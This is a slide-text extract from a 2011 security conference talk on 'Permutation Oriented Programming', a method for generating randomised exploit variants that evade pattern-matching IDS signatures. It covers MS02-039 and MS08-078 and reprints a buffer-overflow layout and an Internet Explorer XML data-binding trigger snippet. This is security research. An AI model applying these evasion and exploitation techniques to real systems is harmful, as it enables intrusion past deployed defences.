vale security conference - 2011 - 13 - nelson brito
DESCRIPTION
Vale Security Conference - 2011 Domingo - 13ª Palestra Palestrante : Nelson Brito Palestra : Permutation Oriented Programming : (Re)searching for alternatives! Twitter (Nelson Brito) : https://twitter.com/#!/nbrito Video (YouTube) : http://www.youtube.com/watch?v=YO9no20SKtk Slide (SlideShare) : http://www.slideshare.net/valesecconf/nelson-britoTRANSCRIPT
![Page 1: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/1.jpg)
![Page 2: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/2.jpg)
Agenda
• 0000 – A long time ago…
• 0001 – Introduction
• 0010 – Brain at work
• 0011 – Approach
• 0100 – Demonstration
• 0101 – Conclusions
• 0110 – Testimonial
• 0111 – Questions and Answers
![Page 3: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/3.jpg)
nbrito@pitbull:~$ whoami
• Nelson Brito: • Computer/Network Security Researcher
Enthusiast • Spare-time Security Researcher • Addict for systems’ (in)security • s e k u r e S D I
• Home town:
• Rio de Janeiro
• Public tools: • T50: an Experimental Mixed Packet Injector • Permutation Oriented Programming • ENG++ SQL Fingerprint™
• WEB:
• http://about.me/nbrito
![Page 4: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/4.jpg)
![Page 5: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/5.jpg)
A long time ago, in a galaxy far, far away…
![Page 6: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/6.jpg)
![Page 7: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/7.jpg)
0-Day • 0-day is cool, isn’t it? But only if nobody is aware of its
existence.
• Once the unknown vulnerability becomes known, the 0-day will expire – since a patch or a mitigation is released (which comes first).
• So we can conclude that, once expired (patched or mitigated), 0-day has no more value. If you do not believe me, you can try to sell a well-known vulnerability to your vulnerability-broker.
• Some security solutions fight against 0-day faster than the affected vendor.
Pattern-matching • This technology is as need today as it was in the past,
but the security solution cannot rely only on this.
• No matter how fast is the pattern-matching algorithm, if a pattern does not match, it means that there is no vulnerability exploitation.
• No vulnerability exploitation, no protection action… But what if the pattern is wrong?
• How can we guarantee that the pattern, which did not match, is the correct approach for a protection action? Was the detection really designed to detect the vulnerability?
Before starting
![Page 8: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/8.jpg)
Exploitation • There are lots of good papers and books describing
the exploitation techniques. Thus, I do recommend you to look for them for a better understanding.
• This lecture has no pretension of being a complete reference for this topic.
• The exploitation path described here is something that I decided to follow, and it helped me to understand and apply POP (f.k.a. ENG++) to the vulnerabilities.
• All the definitions are in compliance with: – Common Vulnerabilities and Exposures. – Common Vulnerability Scoring System. – Common Weakness Enumeration.
Vulnerability • Any vulnerability has a trigger, which leads the
vulnerability to a possible and reasonable exploitation.
• For some weakness types the vulnerability allows to control the flow of software’s execution, executing an arbitrary code (shellcode), such as: CWE-119, CWE-120, CWV-134, CWE-190, CWE-196, CWE-367, etc.
• Before executing a shellcode, the exploitation must deal with the vulnerable ecosystem (trigger, return address, etc…), performing memory manipulation on additional entities (such as: offset, register, JUMP/CALL, stack, heap, memory alignment, memory padding, etc).
Some concepts
![Page 9: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/9.jpg)
Techniques • Packet fragmentation
• Stream segmentation
• Byte and traffic insertion
• Polymorphic shellcode
• Denial of Service
• URL obfuscation (+ SSL encryption)
• RPC fragmentation
• HTML and JavaScript obfuscation
• Etc…
Tools • Fragroute / Fragrouter / Sniffjoke
• ADMutate / ALPHA[2-3] / BETA3 / Others
• Whisker / Nikto / Sandcat
• Snot / Stick / IDS-wakeup / Others
• Sidestep / RPC-evade-poc.pl / Others
• Predator (AET)
• Etc…
Current evasion techniques (a.k.a. TT)
![Page 10: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/10.jpg)
The scenario • Remember: “Some security solutions fight against 0-
day faster than the affected vendor”.
• This protection (mitigation) has a long life, and sometimes the correct protection (patch) is not applied.
• Sometimes, even vendors might adopt pattern-matching to release a mitigation (workaround) while working on a correct patch.
• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, no patch…
• But what if an old and well-known vulnerability could be exploited, even on this security approach model?
• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
The technique • To circumvent or avoid a pattern-matching
technology, there are two options: – Easier: know how the vulnerability is detected
(access to signature/vaccine). – Harder: know deeply how to trigger the
vulnerability and how to exploit it (access to vulnerable ecosystem).
• Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching for alternatives.
– Use all the acquired knowledge and alternatives to offer a variety of decision points (variants).
– Intended to change the behavior of exploit developers.
– Use randomness to provide unpredictable payloads, i.e., permutation.
What is Permutation Oriented Programming?
![Page 11: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/11.jpg)
The scenario • Remember: “Some security solutions fight against 0-
day faster than the affected vendor”.
• This protection (mitigation) has a long life, and sometimes the correct protection (patch) is not applied.
• Sometimes, even vendors might adopt pattern-matching to release a mitigation (workaround) while working on a correct patch.
• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, no patch…
• But what if an old and well-known vulnerability could be exploited, even on this security approach model?
• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
The technique • To circumvent or avoid a pattern-matching
technology, there are two options: – Easier: know how the vulnerability is detected
(access to signature/vaccine). – Harder: know deeply how to trigger the
vulnerability and how to exploit it (access to vulnerable ecosystem).
• Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching for alternatives.
– Use all the acquired knowledge and alternatives to offer a variety of decision points (variants).
– Intended to change the behavior of exploit developers.
– Use randomness to provide unpredictable payloads, i.e., permutation.
What is Permutation Oriented Programming?
![Page 12: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/12.jpg)
The scenario • Remember: “Some security solutions fight against 0-
day faster than the affected vendor”.
• This protection (mitigation) has a long life, and sometimes the correct protection (patch) is not applied.
• Sometimes, even vendors might adopt pattern-matching to release a mitigation (workaround) while working on a correct patch.
• People’s hope, consequently their security strategy, resides on this security model: vulnerability mitigated, no patch…
• But what if an old and well-known vulnerability could be exploited, even on this security approach model?
• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
The technique • To circumvent or avoid a pattern-matching
technology, there are two options: – Easier: know how the vulnerability is detected
(access to signature/vaccine). – Easier: know deeply how to trigger the
vulnerability and how to exploit it (access to vulnerable ecosystem).
• Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching for alternatives.
– Use all the acquired knowledge and alternatives to offer a variety of decision points (variants).
– Intended to change the behavior of exploit developers.
– Use randomness to provide unpredictable payloads, i.e., permutation.
What is Permutation Oriented Programming?
![Page 13: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/13.jpg)
The truth • POP technique deals with vulnerable ecosystem and
memory manipulation, rather than shellcode.
• POP is neither a new polymorphic shellcode technique, nor an obfuscation technique:
– Shellcode is the last thing the exploitation and/or detection should care about.
– Obfuscation is not an elegant technique to apply to an exploitation.
• POP technique can be applied to work with Rapid7
Metasploit Framework, CORE Impact Pro, Immunity CANVAS Professional, and regular stand-alone proof-of-concepts (freestyle coding).
• POP technique maintains the exploitation reliability, even using random decisions, it is able to achieve all exploitation requirements.
The examples • Server-side vulnerabilities:
– MS02-039: CVE-2002-0649/CWE-120. – MS02-056: CVE-2002-1123/CWE-120.
• Client-side vulnerabilities:
– MS08-078: CVE-2008-4844/CWE-367. – MS09-002: CVE-2009-0075/CWE-367.
• Windows 32-bit shellcodes:
– 波動拳: “CMD /k”. – 昇龍拳: “CMD /k set DIRCMD=/b”.
• All example modules were ported to work with
Rapid7 Metasploit Framework, but there are also examples for client-side in HTML and JavaScript.
POP (pronounced /pŏp/) technique
![Page 14: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/14.jpg)
What if…
exploit #1
![Page 15: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/15.jpg)
What if…
exploit #1
exploit #2
![Page 16: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/16.jpg)
What if…
exploit #1
exploit #2 exploit #N
![Page 17: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/17.jpg)
What if…
exploit #1
exploit #2 exploit #N shared zone
![Page 18: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/18.jpg)
What if…
exploit #1
exploit #2 exploit #N shared zone
![Page 19: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/19.jpg)
What if…
exploit #1
exploit #2 exploit #N shared zone
Permutation Oriented
Programming
![Page 20: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/20.jpg)
![Page 21: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/21.jpg)
MS02-039 • Common Vulnerabilities and Exposures:
– CVE-2002-0649.
• Common Weakness Enumeration: – CWE-120.
• CVSS Severity: 7.5 (HIGH).
• Target:
– Microsoft SQL Server 2000 SP0-2.
• Vulnerable ecosystem: – Protocol UDP. – Communication Port 1434. – SQL Request CLNT_UCAST_INST. – INSTANCENAME >= 96 bytes. – INSTANCENAME != NULL.
MS08-078 • Common Vulnerabilities and Exposures:
– CVE-2008-4844.
• Common Weakness Enumeration: – CWE-367.
• CVSS Severity: 9.3 (HIGH).
• Target:
– Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2.
• Vulnerable ecosystem:
– XML Data Island feature enabled (default). – DHTML with embedded Data binding. – XML Data Source Object (DSO). – Data Consumer (HTML element) pointing to a
dereferenced XML DSO.
Vulnerabilities
![Page 22: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/22.jpg)
MS02-039 • Common Vulnerabilities and Exposures:
– CVE-2002-0649.
• Common Weakness Enumeration: – CWE-120.
• CVSS Severity: 7.5 (HIGH).
• Target:
– Microsoft SQL Server 2000 SP0-2.
• Vulnerable ecosystem: – Protocol UDP. – Communication Port 1434. – SQL Request CLNT_UCAST_INST. – INSTANCENAME >= 96 bytes. – INSTANCENAME != NULL.
MS08-078 • Common Vulnerabilities and Exposures:
– CVE-2008-4844.
• Common Weakness Enumeration: – CWE-367.
• CVSS Severity: 9.3 (HIGH).
• Target:
– Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7 and 8 Beta 2.
• Vulnerable ecosystem:
– XML Data Island feature enabled (default). – DHTML with embedded Data binding. – XML Data Source Object (DSO). – Data Consumer (HTML element) pointing to a
dereferenced XML DSO.
Vulnerabilities
![Page 23: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/23.jpg)
![Page 24: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/24.jpg)
![Page 25: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/25.jpg)
![Page 26: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/26.jpg)
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
![Page 27: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/27.jpg)
vulnerability memory manipulation
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
![Page 28: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/28.jpg)
vulnerability memory manipulation
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory stack
![Page 29: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/29.jpg)
vulnerability memory manipulation
0x04
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory stack
request
![Page 30: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/30.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
memory stack
instancename request
![Page 31: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/31.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 32: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/32.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 33: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/33.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 34: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/34.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 35: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/35.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 36: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/36.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 37: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/37.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
overflow
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
instancename request
![Page 38: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/38.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
esp
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 39: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/39.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
esp
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 40: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/40.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
esp
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 41: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/41.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
esp
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 42: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/42.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
esp
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 43: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/43.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 44: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/44.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 45: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/45.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
![Page 46: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/46.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
Trigger
![Page 47: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/47.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
Permutation
![Page 48: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/48.jpg)
vulnerability memory manipulation
0x04 lllllllloooooooonnnnnnnngggggggg instancename
additional entities
return address
jump padding
writable address
shellcode (injected into the stack)
padding
CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
overflow
instancename request
Exploitation
![Page 49: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/49.jpg)
![Page 50: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/50.jpg)
![Page 51: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/51.jpg)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
![Page 52: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/52.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
![Page 53: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/53.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
![Page 54: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/54.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 55: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/55.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 56: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/56.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CElement::GetAAdataFld
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 57: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/57.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CElement::GetAAdataSrc
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 58: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/58.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CRecordInstance::CRecordInstance
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 59: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/59.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CCurrentRecordConsumer::Bind
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
![Page 60: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/60.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Data Consumer #01
DATASRC DATAFLD CCurrentRecordInstance::GetCurrentRecordInstance
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
